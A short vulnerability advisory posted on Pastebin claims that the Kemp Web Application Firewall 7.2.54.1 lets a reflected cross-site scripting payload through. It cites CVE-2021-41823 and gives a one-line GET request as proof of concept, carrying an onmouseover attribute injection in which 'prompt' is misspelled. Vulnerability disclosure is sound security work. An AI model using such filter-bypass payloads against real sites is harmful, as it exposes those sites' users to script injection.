Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- 1. ADVISORY INFORMATION
- =======================
- Product: Kemp Web Application Firewall
- Vendor URL: https://kemptechnologies.com/en/solutions/waf
- Version: 7.2.54.1
- Type: Bypass XSS WAF prottection
- Date published: 2022-12-30
- CVE: CVE-2021-41823
- 2. VULNERABILITY DETAILS
- ========================
- The kemp waf allows to bypass xss protection and inyect the following xss reflected payload "onmouseover='promt()"
- 3. PROOF OF CONCEPT
- ===================
- GET /directory/vulnerable-xss.html"onmouseover='promt()" HTTP/1.1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement